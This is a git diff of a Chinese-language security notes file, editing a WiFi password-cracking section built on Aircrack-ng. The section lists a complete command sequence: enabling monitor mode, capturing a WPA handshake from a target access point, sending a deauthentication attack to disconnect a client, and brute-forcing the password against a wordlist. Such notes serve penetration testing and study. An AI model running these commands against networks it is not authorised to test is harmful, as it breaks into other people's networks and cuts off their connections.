--- a/网络安全.md
+++ b/网络安全.md
@@ -91,25 +91,24 @@ cvs 2401/tcp
 ~~~
 * [`WiFi网络渗透`密码破解](https://www.cnblogs.com/xiao1234oaix/p/17287409.html)[`Aircrack-ng`](https://www.aircrack-ng.org)
 ~~~bash
-sudo -i   #用管理员权限
-ifconfig  #查看当前网卡 Interface = wlan0 || wlan0mon
-airmon-ng              #检查网卡是否支持监听
-airmon-ng start wlan0  #激活无线网卡监听模式 NetworkManager + wpa_supplicant
-airodump-ng wlan0      #扫描周边WiFi信号 + 停止命令Ctrl+C
+sudo -i   # 用管理员权限
+ifconfig  # 查看当前网卡 Interface = wlan0 || wlan0mon
+airmon-ng              # 检查网卡是否支持监听
+airmon-ng start wlan0  # 激活无线网卡监听模式 NetworkManager + wpa_supplicant
+airodump-ng wlan0      # 扫描周边WiFi信号 + 停止命令Ctrl+C
 
 # 被动等待抓包命令 # 保持抓包窗口一直开着 + 停止命令Ctrl+C
-mkdir -p /home/kali/桌面/handshake
-   # airodump参数: -c “CH频段” –bssid “MAC地址”
 airodump-ng -c 11 –bssid *:*:*:*:*:* -w /home/kali/桌面/handshake wlan0
-   # airodump输出: bssid无线网卡MAC地址 + STATION客户端
+   # airodump参数: -c “CH频段” –bssid “MAC地址”
+   # airodump输出: “bssid无线网卡MAC地址” + “STATION客户端”
 
-# 主动ACK循环攻击 # 等一会儿上面窗口中出现握手包: WPA handshake: ******** #然后停止抓包
+# 主动ACK循环攻击 # 等一会儿上面窗口中出现握手包: WPA handshake: ******** # 然后停止抓包
    # aireplay参数: -0 “通知设备断开的攻击次数10” -a “bssid地址” -c “下线STATION客户端”
 aireplay-ng -0 10 -a *:*:*:*:*:* -c *:* wlan0
 
-# 暴力破解密码 # 先获取抓包成功的cap文件
-   # aircracky参数: -w “密码字典文件” -b “bssid地址”
-aircrack-ng -w /home/kali/桌面/password.txt -b *:*:*:*:*:* /home/kali/桌面/handshake*.cap
+# 暴力破解密码
+   # aircracky参数: -b “bssid地址” -w “密码字典文件”  “抓包成功的cap文件”
+aircrack-ng -b *:*:*:*:*:* -w /home/kali/桌面/password.txt /home/kali/桌面/handshake*.cap
 
 # 停止无线网卡监听模式
 airmon-ng stop wlan0 # wlan0mon
